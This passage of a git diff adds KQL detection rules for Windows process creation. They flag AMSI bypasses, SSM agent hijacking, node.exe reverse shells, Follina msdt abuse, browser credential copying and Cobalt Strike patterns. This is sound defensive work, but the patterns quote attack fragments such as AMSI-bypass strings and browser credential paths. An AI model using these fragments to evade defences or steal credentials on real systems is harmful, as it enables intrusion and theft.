+| where (ProcessCommandLine contains " -hang " or ProcessCommandLine contains " -pn " or ProcessCommandLine contains " -pmn " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " -po " or ProcessCommandLine contains " -c " or ProcessCommandLine contains " -sc ") and (FolderPath endswith "\\adplus.exe" or ProcessVersionInfoOriginalFileName =~ "Adplus.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql b/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql
new file mode 100644
index 00000000..4348ae16
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_amazon_ssm_agent_hijacking.kql
@@ -0,0 +1,12 @@
+// Title: Potential Amazon SSM Agent Hijacking
+// Author: Muhammad Faisal
+// Date: 2023-08-02
+// Level: medium
+// Description: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.persistence, attack.t1219.002
+// False Positives:
+//   - Legitimate activity of system administrators
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-register " and ProcessCommandLine contains "-code " and ProcessCommandLine contains "-id " and ProcessCommandLine contains "-region ") and FolderPath endswith "\\amazon-ssm-agent.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql
new file mode 100644
index 00000000..ba5a1327
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_amsi_bypass_using_null_bits.kql
@@ -0,0 +1,10 @@
+// Title: Potential AMSI Bypass Using NULL Bits
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-01-04
+// Level: medium
+// Description: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "if(0){{{0}}}' -f $(0 -as [char]) +" or ProcessCommandLine contains "#<NULL>"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql b/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql
new file mode 100644
index 00000000..941c62c3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_amsi_bypass_via_net_reflection.kql
@@ -0,0 +1,12 @@
+// Title: Potential AMSI Bypass Via .NET Reflection
+// Author: Markus Neis, @Kostastsale
+// Date: 2018-08-17
+// Level: high
+// Description: Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "System.Management.Automation.AmsiUtils" and ProcessCommandLine contains "amsiInitFailed") or (ProcessCommandLine contains "[Ref].Assembly.GetType" and ProcessCommandLine contains "SetValue($null,$true)" and ProcessCommandLine contains "NonPublic,Static")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql b/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql
new file mode 100644
index 00000000..fcd1f49d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_application_whitelisting_bypass_via_dnx_exe.kql
@@ -0,0 +1,13 @@
+// Title: Potential Application Whitelisting Bypass via Dnx.EXE
+// Author: Beyu Denis, oscd.community
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code.
+// Attackers might abuse this in order to bypass application whitelisting.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.t1027.004
+// False Positives:
+//   - Legitimate use of dnx.exe by legitimate user
+
+DeviceProcessEvents
+| where FolderPath endswith "\\dnx.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql
new file mode 100644
index 00000000..d951c614
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_code_execution_via_node_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Arbitrary Code Execution Via Node.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-09
+// Level: high
+// Description: Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --eval ") and FolderPath endswith "\\node.exe") and (ProcessCommandLine contains ".exec(" and ProcessCommandLine contains "net.socket" and ProcessCommandLine contains ".connect" and ProcessCommandLine contains "child_process")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql
new file mode 100644
index 00000000..1af58858
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_using_msdt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary Command Execution Using Msdt.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-29
+// Level: high
+// Description: Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msdt.exe" or ProcessVersionInfoOriginalFileName =~ "msdt.exe") and (ProcessCommandLine contains "IT_BrowseForFile=" or (ProcessCommandLine contains " PCWDiagnostic" and (ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af " or ProcessCommandLine contains " –af " or ProcessCommandLine contains " —af " or ProcessCommandLine contains " ―af ")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql
new file mode 100644
index 00000000..a225d904
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_command_execution_via_ftp_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary Command Execution Via FTP.EXE
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\ftp.exe" or ((ProcessCommandLine contains "-s:" or ProcessCommandLine contains "/s:" or ProcessCommandLine contains "–s:" or ProcessCommandLine contains "—s:" or ProcessCommandLine contains "―s:") and (FolderPath endswith "\\ftp.exe" or ProcessVersionInfoOriginalFileName =~ "ftp.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql b/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql
new file mode 100644
index 00000000..05f7e90e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_dll_load_using_winword.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary DLL Load Using Winword
+// Author: Victor Sergeev, oscd.community
+// Date: 2020-10-09
+// Level: medium
+// Description: Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/l " and ProcessCommandLine contains ".dll") and (FolderPath endswith "\\WINWORD.exe" or ProcessVersionInfoOriginalFileName =~ "WinWord.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql
new file mode 100644
index 00000000..c9a15cd8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_using_office_application.kql
@@ -0,0 +1,10 @@
+// Title: Potential Arbitrary File Download Using Office Application
+// Author: Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
+// Date: 2022-05-17
+// Level: high
+// Description: Detects potential arbitrary file download using a Microsoft Office application
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and ((FolderPath endswith "\\EXCEL.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe") or (ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "POWERPNT.EXE", "WinWord.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql
new file mode 100644
index 00000000..250390c8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_arbitrary_file_download_via_cmdl32_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Arbitrary File Download Via Cmdl32.EXE
+// Author: frack113
+// Date: 2021-11-03
+// Level: medium
+// Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags.
+// Attackers can abuse this utility in order to download arbitrary files via a configuration file.
+// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/vpn" and ProcessCommandLine contains "/lan") and (FolderPath endswith "\\cmdl32.exe" or ProcessVersionInfoOriginalFileName =~ "CMDL32.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql
new file mode 100644
index 00000000..a8fb2192
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_binary_impersonating_sysinternals_tools.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Impersonating Sysinternals Tools
+// Author: frack113, Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-12-20
+// Level: medium
+// Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection.
+// This rule looks for the execution of binaries that are named similarly to Sysinternals tools.
+// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\accesschk64a.exe" or FolderPath endswith "\\ADExplorer64a.exe" or FolderPath endswith "\\ADInsight64a.exe" or FolderPath endswith "\\adrestore64a.exe" or FolderPath endswith "\\Autologon64a.exe" or FolderPath endswith "\\Autoruns64a.exe" or FolderPath endswith "\\autorunsc64a.exe" or FolderPath endswith "\\Clockres64a.exe" or FolderPath endswith "\\Contig64a.exe" or FolderPath endswith "\\Coreinfo64a.exe" or FolderPath endswith "\\Dbgview64a.exe" or FolderPath endswith "\\disk2vhd64a.exe" or FolderPath endswith "\\diskext64a.exe" or FolderPath endswith "\\DiskView64a.exe" or FolderPath endswith "\\du64a.exe" or FolderPath endswith "\\FindLinks64a.exe" or FolderPath endswith "\\handle64a.exe" or FolderPath endswith "\\hex2dec64a.exe" or FolderPath endswith "\\junction64a.exe" or FolderPath endswith "\\LoadOrd64a.exe" or FolderPath endswith "\\LoadOrdC64a.exe" or FolderPath endswith "\\logonsessions64a.exe" or FolderPath endswith "\\movefile64a.exe" or FolderPath endswith "\\notmyfault64a.exe" or FolderPath endswith "\\notmyfaultc64a.exe" or FolderPath endswith "\\pendmoves64a.exe" or FolderPath endswith "\\pipelist64a.exe" or FolderPath endswith "\\procdump64a.exe" or FolderPath endswith "\\procexp64a.exe" or FolderPath endswith "\\Procmon64a.exe" or FolderPath endswith "\\PsExec64a.exe" or FolderPath endswith "\\psfile64a.exe" or FolderPath endswith "\\PsGetsid64a.exe" or FolderPath endswith "\\PsInfo64a.exe" or FolderPath endswith "\\pskill64a.exe" or FolderPath endswith "\\psloglist64a.exe" or FolderPath endswith "\\pspasswd64a.exe" or FolderPath endswith "\\psping64a.exe" or FolderPath endswith "\\PsService64a.exe" or FolderPath endswith "\\pssuspend64a.exe" or FolderPath endswith "\\RAMMap64a.exe" or FolderPath endswith "\\RegDelNull64a.exe" or FolderPath endswith "\\ru64a.exe" or FolderPath endswith "\\sdelete64a.exe" or FolderPath endswith "\\sigcheck64a.exe" or FolderPath endswith "\\streams64a.exe" or FolderPath endswith "\\strings64a.exe" or FolderPath endswith "\\sync64a.exe" or FolderPath endswith "\\Sysmon64a.exe" or FolderPath endswith "\\tcpvcon64a.exe" or FolderPath endswith "\\tcpview64a.exe" or FolderPath endswith "\\vmmap64a.exe" or FolderPath endswith "\\whois64a.exe" or FolderPath endswith "\\Winobj64a.exe" or FolderPath endswith "\\ZoomIt64a.exe") or (FolderPath endswith "\\accesschk.exe" or FolderPath endswith "\\accesschk64.exe" or FolderPath endswith "\\AccessEnum.exe" or FolderPath endswith "\\ADExplorer.exe" or FolderPath endswith "\\ADExplorer64.exe" or FolderPath endswith "\\ADInsight.exe" or FolderPath endswith "\\ADInsight64.exe" or FolderPath endswith "\\adrestore.exe" or FolderPath endswith "\\adrestore64.exe" or FolderPath endswith "\\Autologon.exe" or FolderPath endswith "\\Autologon64.exe" or FolderPath endswith "\\Autoruns.exe" or FolderPath endswith "\\Autoruns64.exe" or FolderPath endswith "\\autorunsc.exe" or FolderPath endswith "\\autorunsc64.exe" or FolderPath endswith "\\Bginfo.exe" or FolderPath endswith "\\Bginfo64.exe" or FolderPath endswith "\\Cacheset.exe" or FolderPath endswith "\\Cacheset64.exe" or FolderPath endswith "\\Clockres.exe" or FolderPath endswith "\\Clockres64.exe" or FolderPath endswith "\\Contig.exe" or FolderPath endswith "\\Contig64.exe" or FolderPath endswith "\\Coreinfo.exe" or FolderPath endswith "\\Coreinfo64.exe" or FolderPath endswith "\\CPUSTRES.EXE" or FolderPath endswith "\\CPUSTRES64.EXE" or FolderPath endswith "\\ctrl2cap.exe" or FolderPath endswith "\\Dbgview.exe" or FolderPath endswith "\\dbgview64.exe" or FolderPath endswith "\\Desktops.exe" or FolderPath endswith "\\Desktops64.exe" or FolderPath endswith "\\disk2vhd.exe" or FolderPath endswith "\\disk2vhd64.exe" or FolderPath endswith "\\diskext.exe" or FolderPath endswith "\\diskext64.exe" or FolderPath endswith "\\Diskmon.exe" or FolderPath endswith "\\Diskmon64.exe" or FolderPath endswith "\\DiskView.exe" or FolderPath endswith "\\DiskView64.exe" or FolderPath endswith "\\du.exe" or FolderPath endswith "\\du64.exe" or FolderPath endswith "\\efsdump.exe" or FolderPath endswith "\\FindLinks.exe" or FolderPath endswith "\\FindLinks64.exe" or FolderPath endswith "\\handle.exe" or FolderPath endswith "\\handle64.exe" or FolderPath endswith "\\hex2dec.exe" or FolderPath endswith "\\hex2dec64.exe" or FolderPath endswith "\\junction.exe" or FolderPath endswith "\\junction64.exe" or FolderPath endswith "\\ldmdump.exe" or FolderPath endswith "\\listdlls.exe" or FolderPath endswith "\\listdlls64.exe" or FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe" or FolderPath endswith "\\loadOrd.exe" or FolderPath endswith "\\loadOrd64.exe" or FolderPath endswith "\\loadOrdC.exe" or FolderPath endswith "\\loadOrdC64.exe" or FolderPath endswith "\\logonsessions.exe" or FolderPath endswith "\\logonsessions64.exe" or FolderPath endswith "\\movefile.exe" or FolderPath endswith "\\movefile64.exe" or FolderPath endswith "\\notmyfault.exe" or FolderPath endswith "\\notmyfault64.exe" or FolderPath endswith "\\notmyfaultc.exe" or FolderPath endswith "\\notmyfaultc64.exe" or FolderPath endswith "\\ntfsinfo.exe" or FolderPath endswith "\\ntfsinfo64.exe" or FolderPath endswith "\\pendmoves.exe" or FolderPath endswith "\\pendmoves64.exe" or FolderPath endswith "\\pipelist.exe" or FolderPath endswith "\\pipelist64.exe" or FolderPath endswith "\\portmon.exe" or FolderPath endswith "\\procdump.exe" or FolderPath endswith "\\procdump64.exe" or FolderPath endswith "\\procexp.exe" or FolderPath endswith "\\procexp64.exe" or FolderPath endswith "\\Procmon.exe" or FolderPath endswith "\\Procmon64.exe" or FolderPath endswith "\\psExec.exe" or FolderPath endswith "\\psExec64.exe" or FolderPath endswith "\\psfile.exe" or FolderPath endswith "\\psfile64.exe" or FolderPath endswith "\\psGetsid.exe" or FolderPath endswith "\\psGetsid64.exe" or FolderPath endswith "\\psInfo.exe" or FolderPath endswith "\\psInfo64.exe" or FolderPath endswith "\\pskill.exe" or FolderPath endswith "\\pskill64.exe" or FolderPath endswith "\\pslist.exe" or FolderPath endswith "\\pslist64.exe" or FolderPath endswith "\\psLoggedon.exe" or FolderPath endswith "\\psLoggedon64.exe" or FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe" or FolderPath endswith "\\pspasswd.exe" or FolderPath endswith "\\pspasswd64.exe" or FolderPath endswith "\\psping.exe" or FolderPath endswith "\\psping64.exe" or FolderPath endswith "\\psService.exe" or FolderPath endswith "\\psService64.exe" or FolderPath endswith "\\psshutdown.exe" or FolderPath endswith "\\psshutdown64.exe" or FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe" or FolderPath endswith "\\RAMMap.exe" or FolderPath endswith "\\RAMMap64.exe" or FolderPath endswith "\\RDCMan.exe" or FolderPath endswith "\\RegDelNull.exe" or FolderPath endswith "\\RegDelNull64.exe" or FolderPath endswith "\\regjump.exe" or FolderPath endswith "\\ru.exe" or FolderPath endswith "\\ru64.exe" or FolderPath endswith "\\sdelete.exe" or FolderPath endswith "\\sdelete64.exe" or FolderPath endswith "\\ShareEnum.exe" or FolderPath endswith "\\ShareEnum64.exe" or FolderPath endswith "\\shellRunas.exe" or FolderPath endswith "\\sigcheck.exe" or FolderPath endswith "\\sigcheck64.exe" or FolderPath endswith "\\streams.exe" or FolderPath endswith "\\streams64.exe" or FolderPath endswith "\\strings.exe" or FolderPath endswith "\\strings64.exe" or FolderPath endswith "\\sync.exe" or FolderPath endswith "\\sync64.exe" or FolderPath endswith "\\Sysmon.exe" or FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\tcpvcon.exe" or FolderPath endswith "\\tcpvcon64.exe" or FolderPath endswith "\\tcpview.exe" or FolderPath endswith "\\tcpview64.exe" or FolderPath endswith "\\Testlimit.exe" or FolderPath endswith "\\Testlimit64.exe" or FolderPath endswith "\\vmmap.exe" or FolderPath endswith "\\vmmap64.exe" or FolderPath endswith "\\Volumeid.exe" or FolderPath endswith "\\Volumeid64.exe" or FolderPath endswith "\\whois.exe" or FolderPath endswith "\\whois64.exe" or FolderPath endswith "\\Winobj.exe" or FolderPath endswith "\\Winobj64.exe" or FolderPath endswith "\\ZoomIt.exe" or FolderPath endswith "\\ZoomIt64.exe")) and (not(((isnull(ProcessVersionInfoCompanyName) or isnull(ProcessVersionInfoProductName)) or ((ProcessVersionInfoCompanyName in~ ("Sysinternals - www.sysinternals.com", "Sysinternals")) or ProcessVersionInfoProductName startswith "Sysinternals"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql
new file mode 100644
index 00000000..f1fc8453
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_cdb_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Proxy Execution Via Cdb.EXE
+// Author: Beyu Denis, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-26
+// Level: medium
+// Description: Detects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106, attack.defense-evasion, attack.t1218, attack.t1127
+// False Positives:
+//   - Legitimate use of debugging tools
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -c " or ProcessCommandLine contains " -cf ") and (FolderPath endswith "\\cdb.exe" or ProcessVersionInfoOriginalFileName =~ "CDB.Exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
new file mode 100644
index 00000000..abf1edc8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_binary_proxy_execution_via_vsdiagnostics_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Binary Proxy Execution Via VSDiagnostics.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects execution of "VSDiagnostics.exe" with the "start" command in order to launch and proxy arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate usage for tracing and diagnostics purposes
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " /launch:" or ProcessCommandLine contains " -launch:") and ProcessCommandLine contains "start" and (FolderPath endswith "\\VSDiagnostics.exe" or ProcessVersionInfoOriginalFileName =~ "VSDiagnostics.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql b/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql
new file mode 100644
index 00000000..2f198cda
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_browser_data_stealing.kql
@@ -0,0 +1,12 @@
+// Title: Potential Browser Data Stealing
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-23
+// Level: medium
+// Description: Adversaries may acquire credentials from web browsers by reading files specific to the target browser.
+// Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.
+// Web browsers typically store the credentials in an encrypted format within a credential store.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") or (FolderPath endswith "\\esentutl.exe" or FolderPath endswith "\\xcopy.exe" or FolderPath endswith "\\robocopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("esentutl.exe", "XCOPY.EXE", "robocopy.exe"))) and (ProcessCommandLine contains "\\Amigo\\User Data" or ProcessCommandLine contains "\\BraveSoftware\\Brave-Browser\\User Data" or ProcessCommandLine contains "\\CentBrowser\\User Data" or ProcessCommandLine contains "\\Chromium\\User Data" or ProcessCommandLine contains "\\CocCoc\\Browser\\User Data" or ProcessCommandLine contains "\\Comodo\\Dragon\\User Data" or ProcessCommandLine contains "\\Elements Browser\\User Data" or ProcessCommandLine contains "\\Epic Privacy Browser\\User Data" or ProcessCommandLine contains "\\Google\\Chrome Beta\\User Data" or ProcessCommandLine contains "\\Google\\Chrome SxS\\User Data" or ProcessCommandLine contains "\\Google\\Chrome\\User Data\\" or ProcessCommandLine contains "\\Kometa\\User Data" or ProcessCommandLine contains "\\Maxthon5\\Users" or ProcessCommandLine contains "\\Microsoft\\Edge\\User Data" or ProcessCommandLine contains "\\Mozilla\\Firefox\\Profiles" or ProcessCommandLine contains "\\Nichrome\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera GX Stable\\" or ProcessCommandLine contains "\\Opera Software\\Opera Neon\\User Data" or ProcessCommandLine contains "\\Opera Software\\Opera Stable\\" or ProcessCommandLine contains "\\Orbitum\\User Data" or ProcessCommandLine contains "\\QIP Surf\\User Data" or ProcessCommandLine contains "\\Sputnik\\User Data" or ProcessCommandLine contains "\\Torch\\User Data" or ProcessCommandLine contains "\\uCozMedia\\Uran\\User Data" or ProcessCommandLine contains "\\Vivaldi\\User Data")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql b/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql
new file mode 100644
index 00000000..b77923f8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_cobaltstrike_process_patterns.kql
@@ -0,0 +1,10 @@
+// Title: Potential CobaltStrike Process Patterns
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-27
+// Level: high
+// Description: Detects potential process patterns related to Cobalt Strike beacon activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and (InitiatingProcessCommandLine contains "cmd.exe /C echo" and InitiatingProcessCommandLine contains " > \\\\.\\pipe")) or (ProcessCommandLine endswith "conhost.exe 0xffffffff -ForceV1" and InitiatingProcessCommandLine endswith "/C whoami") or (ProcessCommandLine endswith "cmd.exe /C whoami" and InitiatingProcessFolderPath startswith "C:\\Temp\\") or ((ProcessCommandLine contains "cmd.exe /c echo" and ProcessCommandLine contains "> \\\\.\\pipe") and (InitiatingProcessFolderPath endswith "\\runonce.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql b/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql
new file mode 100644
index 00000000..1be42575
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_com_objects_download_cradles_usage_process_creation.kql
@@ -0,0 +1,12 @@
+// Title: Potential COM Objects Download Cradles Usage - Process Creation
+// Author: frack113
+// Date: 2022-12-25
+// Level: medium
+// Description: Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+// False Positives:
+//   - Legitimate use of the library
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "[Type]::GetTypeFromCLSID(" and (ProcessCommandLine contains "0002DF01-0000-0000-C000-000000000046" or ProcessCommandLine contains "F6D90F16-9C73-11D3-B32E-00C04F990BB4" or ProcessCommandLine contains "F5078F35-C551-11D3-89B9-0000F81FE221" or ProcessCommandLine contains "88d96a0a-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "AFBA6B42-5692-48EA-8141-DC517DCF0EF1" or ProcessCommandLine contains "AFB40FFD-B609-40A3-9828-F88BBE11E4E3" or ProcessCommandLine contains "88d96a0b-f192-11d4-a65f-0040963251e5" or ProcessCommandLine contains "2087c2f4-2cef-4953-a8ab-66779b670495" or ProcessCommandLine contains "000209FF-0000-0000-C000-000000000046" or ProcessCommandLine contains "00024500-0000-0000-C000-000000000046")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql b/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql
new file mode 100644
index 00000000..7a92d063
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_command_line_path_traversal_evasion_attempt.kql
@@ -0,0 +1,13 @@
+// Title: Potential Command Line Path Traversal Evasion Attempt
+// Author: Christian Burkard (Nextron Systems)
+// Date: 2021-10-26
+// Level: medium
+// Description: Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+// False Positives:
+//   - Google Drive
+//   - Citrix
+
+DeviceProcessEvents
+| where (((ProcessCommandLine contains "\\..\\Windows\\" or ProcessCommandLine contains "\\..\\System32\\" or ProcessCommandLine contains "\\..\\..\\") and FolderPath contains "\\Windows\\") or ProcessCommandLine contains ".exe\\..\\") and (not((ProcessCommandLine contains "\\Citrix\\Virtual Smart Card\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\..\\" or ProcessCommandLine contains "\\Google\\Drive\\googledrivesync.exe\\..\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql
new file mode 100644
index 00000000..b45535bc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_escape_characters.kql
@@ -0,0 +1,10 @@
+// Title: Potential Commandline Obfuscation Using Escape Characters
+// Author: juju4
+// Date: 2018-12-11
+// Level: medium
+// Description: Detects potential commandline obfuscation using known escape characters
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1140
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
new file mode 100644
index 00000000..b533fb41
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql
@@ -0,0 +1,11 @@
+// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image
+// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels
+// Date: 2024-09-02
+// Level: high
+// Description: Detects potential commandline obfuscation using unicode characters.
